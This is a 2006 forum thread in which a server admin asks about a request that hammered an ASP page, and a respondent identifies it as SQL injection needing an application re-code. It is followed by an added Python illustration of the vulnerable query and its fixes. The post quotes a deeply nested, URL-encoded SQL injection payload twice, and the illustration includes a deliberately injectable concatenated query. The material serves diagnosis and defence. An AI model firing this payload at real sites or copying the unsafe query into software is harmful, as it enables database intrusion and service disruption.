Hi there, one of the domains on our server had the attack below. We have stopped
it by checking if the id variable is a number. Although our server is Win2003
with the latest patches, this code seems to exploit it and puts it in some kind of
loop that, until stopped, keeps eating CPU on that domain. Does anyone know what
it's called and what the permanent resolution is?

The attacker used the following:


/page.asp
show=single&id=190%20and%201=(select%20id%20from%20elestiriler%20where%20id=
(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestir
iler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20i
d%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20wher
e%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20
elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(sel
ect%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler
%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20
from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20
id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20eles
tiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%
20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20w
here%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from
%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(
select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiri
ler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id
%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where
%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20e
lestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(sele
ct%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%
20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20f
rom%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20i
d=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elest
iriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%2
0id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20wh
ere%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%
20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(s
elect%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiril
er%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%
20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%
20id=(select%20id%20from%20elestiriler%20where%20id=id/123*22213))))))))))))
)))))))))))))))))))))))))))))))))))))


Re: some kind of attack? by Kristofer

Tue May 02 16:03:26 CDT 2006

Hello,

It is called SQL Injection, and it succeeds because your web application
is not properly secured against this kind of attack (i.e. the developers
of your web application did not do their job).

The permanent solution is to re-code your application and make sure that this
does not succeed. There is nothing in IIS you can do about it, because the
vulnerability is not in IIS (IIS does not interpret query strings, your
web application does), it is in your custom-made web application.

For more information on SQL Injection, and how to protect yourself against
it, search for the term "SQL Injection" using your favorite search engine
on the Internet.

This may also be of some interest:

http://blogs.msdn.com/david.wang/archive/2005/07/18/Why_URLScan_ignores_querystring_for_DenyUrlSequences.aspx


--
Regards,
Kristofer Gafvert
http://www.gafvert.info/iis/ - IIS Related Info


noLoveLusT wrote:

>Hi there, one of the domains on our server had the attack below. We have stopped
>it by checking if the id variable is a number. Although our server is Win2003
>with the latest patches, this code seems to exploit it and puts it in some kind of
>loop that, until stopped, keeps eating CPU on that domain. Does anyone know what
>it's called and what the permanent resolution is?
>
>The attacker used the following:
>
>
>/page.asp
>show=single&id=190%20and%201=(select%20id%20from%20elestiriler%20where%20id=
>(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestir
>iler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20i
>d%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20wher
>e%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20
>elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(sel
>ect%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler
>%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20
>from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20
>id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20eles
>tiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%
>20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20w
>here%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from
>%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(
>select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiri
>ler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id
>%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where
>%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20e
>lestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(sele
>ct%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%
>20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20f
>rom%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20i
>d=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elest
>iriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%2
>0id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20wh
>ere%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%
>20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(s
>elect%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiril
>er%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%
>20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%
>20id=(select%20id%20from%20elestiriler%20where%20id=id/123*22213))))))))))))
>)))))))))))))))))))))))))))))))))))))
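As an added illustration (not code from the thread or from either poster): the query pattern that lets the request above run as SQL, beside the two fixes the thread discusses, the strict numeric check on id that the original poster applied and a parameterized query as the permanent re-code Kristofer recommends. It assumes a table named elestiriler with an integer id column (the name is taken from the payload), uses an in-memory SQLite database in place of the site's real one, and the payload is a constructed, shortened copy of the thread's query-string value.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for the site's database: the payload in the thread
# targets a table called "elestiriler" with an integer id column.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE elestiriler (id INTEGER PRIMARY KEY, title TEXT)")
conn.executemany("INSERT INTO elestiriler VALUES (?, ?)",
                 [(190, "entry 190"), (191, "entry 191")])

# Constructed, shortened form of the query-string value from the thread
# (the real one nests the subselect roughly fifty levels deep).
PAYLOAD = unquote("190%20and%201=(select%20id%20from%20elestiriler%20where%20id="
                  "(select%20id%20from%20elestiriler%20where%20id=id/123*22213))")

def lookup_unsafe(raw_id):
    """The vulnerable pattern: the query-string value is pasted into the SQL
    text, so everything the attacker appended is parsed and executed as SQL.
    Returns the SQL that was run and the rows it produced."""
    sql = "SELECT id, title FROM elestiriler WHERE id=" + raw_id
    return sql, conn.execute(sql).fetchall()

def parse_id(raw_id):
    """Fix 1 (what the original poster did): accept only a plain integer.
    Anything else, including the whole injected tail, is rejected outright."""
    return int(raw_id) if re.fullmatch(r"[0-9]{1,9}", raw_id) else None

def lookup_param(raw_id):
    """Fix 2 (the permanent one): bind the value as a query parameter so the
    database never treats it as SQL. Combined with parse_id, a non-numeric
    value is refused before any query is built."""
    id_val = parse_id(raw_id)
    if id_val is None:
        return None
    return conn.execute("SELECT id, title FROM elestiriler WHERE id=?",
                        (id_val,)).fetchall()

def injected_subselects(raw_id):
    """Detection helper for request logs: count nested subselects in a
    parameter value. Deep nesting is the visible feature of the request in
    the thread, which the poster reports as pegging the CPU."""
    return len(re.findall(r"\(\s*select\b", raw_id, re.IGNORECASE))
```

With the concatenated query the injected SQL executes without error (here it simply matches no row); with the checked and parameterized lookup the same value never reaches the database.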